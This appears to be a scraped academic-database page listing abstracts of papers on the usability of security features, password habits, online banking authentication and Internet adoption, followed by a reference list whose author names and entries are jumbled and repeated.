Computer users are exposed to technology mainly through user interfaces. Most users' perceptions are based on their experience with these interfaces. HCI (human computer interaction) is concerned with these interfaces and how they can be improved. Considerable research has been conducted and major advances have been made in the area of HCI. Information security is becoming increasingly important and more complex as business is conducted electronically. However, state-of-the-art security-related product development has ignored general aspects of HCI. The objective of this paper is to promote and enable security awareness of end-users in their interaction with computer systems. It thus aims to consolidate and integrate the two fields of information security and HCI. HCI as a research discipline is a well developed field of study, and the authors are of the opinion that the use of security technologies can be significantly enhanced by employing proven HCI concepts in the design of these technologies. In order to achieve this, various criteria for a successful HCI in a security-specific environment will be examined. Part of the Windows XP Internet Connection Firewall will be used as a case study and analysed according to these criteria, and recommendations will be made.
Article
With an increasing range of potential threats, the use of security within end-user systems and applications is becoming ever more important. However, a significant obstacle to achieving this can be the usability of the security features that are offered, and although related functionality is now provided in a wide range of end-user applications, the users themselves will fail to benefit if they cannot make it work for them. This paper highlights the importance of enabling users to protect themselves, and identifies that they may currently encounter problems in terms of finding, understanding, and ultimately using the security features that are meant to be at their disposal. The security options within Microsoft Word are used to provide illustrative examples of typical problems, with consequent suggestions to improve both the presentation and guidance available to users within such applications.
Article
The Internet has the ability to function as a business medium. Over one-third of US residents use the Internet, and nearly 40% use it as a medium of business (electronic-commerce). As this percentage continues to grow, so does the need to understand why and how users choose to adopt. This information will afford researchers and e-commerce providers a better understanding of how to facilitate future adoption. Through the diffusion of innovations model, this study revisits traditional and current concepts of adoption by investigating the adoption of four e-commerce activities currently available to Internet users: (1) online shopping, (2) online banking, (3) online investing, and (4) electronic payment for an Internet service (i.e., access to exclusive sites). Results indicate that six attributes common to the diffusion model (i.e., perceived convenience and financial benefits, risk, previous use of the telephone for a similar purpose, self-efficacy, and Internet use) all play a significant role in the adoption processes. Results also indicate that when users decide to adopt one of these activities they tend to adopt another. Finally, a discussion explores how to extend the model identified in this study by assessing possible negative outcomes of diffusion.
Article
Computer security has traditionally been assessed from a technical point of view. Another way to assess it is by investigating the role played by legitimate users of systems in impairing the level of protection. In order to address this issue, we wish to adopt a multidisciplinary standpoint and investigate some of the human aspects involved in computer security. From research in psychology, it is known that people make biased decisions. They sometimes overlook rules in order to gain maximum benefits for the cost of a given action. This situation leads to insidious security lapses whereby the level of protection is traded-off against usability. In this paper, we highlight the cognitive processes underlying such security impairments. At the end of the paper, we propose a short usability-centred set of recommendations.
Article
In the modern multi-user computer environment, Internet-capable network servers provide connectivi- ty that allows a large portion of the user population to access information at the desktop from sources around the world. Because of the ease with which information can be accessed, computer security breaches may occur unless systems and restricted information stored therein are kept secure. Breaches of security can have serious consequences, including theft of confidential corporate documents, compro- mise of intellectual property, unauthorized modifica- tion of systems and data, denial of service, and others. Considerable research has been conducted on threats to security.
Article
Organizations are more dependent than ever on the reliable operation of their information systems, which have become a key to their success and effectiveness. While the growing dependence on information systems creates an urgent need to collect information and make it accessible, the proliferation of computer technology has also spawned opportunities for ill-intentioned individuals to violate the information systems' integrity and validity.One of the most common control mechanisms for authenticating users of computerized information systems is the use of passwords. However, despite the widespread use of passwords, little attention has been given to the characteristics of their actual use. This paper addresses the gap in evaluating the characteristics of real-life passwords and presents the results of an empirical study on password usage. It investigates the core characteristics of user-generated passwords and associations among those characteristics.
Article
The Internet has been given tremendous publicity in recent years. However, most research focuses on Europe or America rather on than Asian countries. This study hopes to contribute to a better understanding of the Internet phenomenon in Asia by examining the factors influencing the adoption and nonadoption of the Internet among organizations in Singapore. A survey was carried out among business firms to examine the benefits of adopting the Internet, reasons for not adopting the Internet, and the criteria for selecting Internet access service providers. The results showed that key benefits are derived from the global nature of the Internet, which enables access to worldwide information and the creation of a worldwide electronic presence. Nonadopters of the Internet are concerned about whether staff will waste time surfing the Internet. Both access speed and technical support are viewed as important criteria in selecting an Internet access service provider (IASP). Implications of the results are discussed.
Article
Legislative mandates potentially replace CIO's primary concerns of technology risk management with the possibility of serving jail time.
Article
The consequences of information system failure become more acute as organizations continue to invest in information technology and application development. Being able to better predict IS failure before implementation of a system could facilitate changes in the information system that can lead to implementation success. The realism of user expectations has been suggested as one possible means of assessing the eventual success or failure of an IS. Cognitive dissonance theory was used to hypothesize the behavior and attitudes of end users having certain expectations of a system. This experiment investigates the association between unrealistic expectations with both users' perceptions (i.e., user satisfaction) and their performance with the IS (i.e., decision performance). A longitudinal experiment was performed in which the expectations of the subjects were manipulated to be unrealistically high, realistically moderate, or unrealistically low. The results suggest an association between realism of users' expectations and their perceptions but not their actual performance. Future research should be directed toward the development of an instrument to measure user expectations, as well as toward understanding the causes of unrealistic user expectations.
Article
The Internet is gaining popularity as a delivery channel in the banking sector. At the same time, customer needs are changing. A total of 12 Internet banking operations in the UK are analysed under customer empowerment functions and Internet banking Web attributes. Internet banking renders location and time irrelevant, and empowers customers with greater control of their accounts. Banks achieve cost and efficiency gains in a large number of operational areas.
Article
Growing threats to online banking security (e.g. phishing, personal identify fraud) and the personal nature of the data make the balance between security, trust and usability vital. However, there is little published research about what influences users' perceptions of online banking security and trust. This study identifies that the type of authentication system used can affect users' subsequent perceived control, situational awareness and trust. The results from a questionnaire and in-depth interviews with 86 participants were triangulated to compare two different authentication processes, namely, a 'security box' (i.e. random system generated passwords at the users' location) and 'fixed passwords' (i.e. user owned and constant). The security box and login procedures were perceived significantly more trustworthy and secure at any location than 'fixed passwords'. Four main concepts were identified: "trust" "the authentication system", "location" and "control". The implications of these findings for HCI are discussed.
Article
The Trustworthy Interfaces for Passwords and Personal Information workshop brought security and user interface professionals together to determine ways to improve authentication methods so that users won't be tricked by phishers into giving away personal information. The authors consider some of the themes discussed at TIPPI, including the nature of the authentication problem, systems that might help solve it, and other observations on necessary components of secure systems designed for human users.
Article
For decades, the password has been the standard means for user authentication on computers. However, as users are required to remember more, longer, and changing passwords, it is evident that a more convenient and secure solution to user authentication is necessary. This paper examines passwords, security tokens, and biometrics-which we collectively call authenticators-and compares these authenticators and their combinations. We examine their effectiveness against several attacks and suitability for particular security specifications such as compromise detection and nonrepudiation. Examples of authenticator combinations and protocols are described to show tradeoffs and solutions that meet chosen, practical requirements. The paper endeavors to offer a comprehensive picture of user authentication solutions for the purposes of evaluating options for use and identifying deficiencies requiring further research.
Article
This paper describes the history of the design of the password security scheme on a remotely accessed time-sharing system. The present design was the result of countering observed attempts to penetrate the system. The result is a compromise between extreme security and ease of use.
FFIEC releases guidance on authentication in internet banking environment, press release Available from
  • Ffiec
FFIEC. FFIEC releases guidance on authentication in internet banking environment, press release. Available from: http:// www.ffiec.gov/press/pr101205.htm; 2005 (accessed 22.07.08).
Design for usability Security and usability. O'Reilly
  • B Tognazzini
Tognazzini B. Design for usability. In: Cranor, Garfinkel, editors. Security and usability. O'Reilly; 2005. p. 31–46 [chapter 3].
Human-computer interaction. Wokingham, UK: Addison-Wesley; 1994. Ranger S. Chip and PIN heads for cyberspace, silicon.com financial services news, CNET networks
  • Reilly J Preece
  • Rogers Y H Sharp
  • D Benyon
  • S Holland
  • Carey
O'Reilly; 2005. p. 221–42 [chapter 12]. Preece J, Rogers Y, Sharp H, Benyon D, Holland S, Carey T. Human-computer interaction. Wokingham, UK: Addison-Wesley; 1994. Ranger S. Chip and PIN heads for cyberspace, silicon.com financial services news, CNET networks, UK. Available from: http://www.silicon.com/financialservices/0,3800010322, 39152706,00.htm; 2005 (accessed 31.01.07).
Building security and trust in online banking In: Extended abstracts on human factors in computing systems (CHI '05)
  • Adams M A Nilsson
  • Herd
Nilsson M, Adams A, Herd S. Building security and trust in online banking. In: Extended abstracts on human factors in computing systems (CHI '05). New York, NY: ACM Press; 2005. pp. 1701–04.
Usability design and evaluation for privacy and security solutions Security and usability. O'Reilly Kline P. The handbook of psychological testing. Routledge; 2000. Knight W. The price of love
  • Karat
  • Cm
  • C Brodie
  • Karat
Karat CM, Brodie C, Karat J. Usability design and evaluation for privacy and security solutions. In: Cranor, Garfinkel, editors. Security and usability. O'Reilly; 2005. p. 47–74 [chapter 4]. Kline P. The handbook of psychological testing. Routledge; 2000. Knight W. The price of love. Infosecurity 2008;5(1):30–3.
Remote card authentication Available from: http://www. apacs.org.uk/payments_industry/new_technology2.html
APACS. Remote card authentication. Available from: http://www. apacs.org.uk/payments_industry/new_technology2.html; 2008 (accessed 22.07.08).
Usability design and evaluation for privacy and security solutions
  • Cm Karat
  • C Brodie
  • J Karat
Karat CM, Brodie C, Karat J. Usability design and evaluation for privacy and security solutions. In: Cranor, Garfinkel, editors. Security and usability. O'Reilly; 2005. p. 47–74 [chapter 4].
The handbook of psychological testing. Routledge; 2000. Knight W. The price of love
  • P Kline
Kline P. The handbook of psychological testing. Routledge; 2000. Knight W. The price of love. Infosecurity 2008;5(1):30–3.
Research methods in human computer interaction Handbook of human computer interaction. Amsterdam: NorthHolland
  • Tk Landauer
Landauer TK. Research methods in human computer interaction. In: Helander M, editor. Handbook of human computer interaction. Amsterdam: NorthHolland; 1988. p. 905–28.
Chip and PIN heads for cyberspace, silicon.com financial services news, CNET networks, UK. Available from
  • S Ranger
Ranger S. Chip and PIN heads for cyberspace, silicon.com financial services news, CNET networks, UK. Available from: http://www.silicon.com/financialservices/0,3800010322, 39152706,00.htm; 2005 (accessed 31.01.07).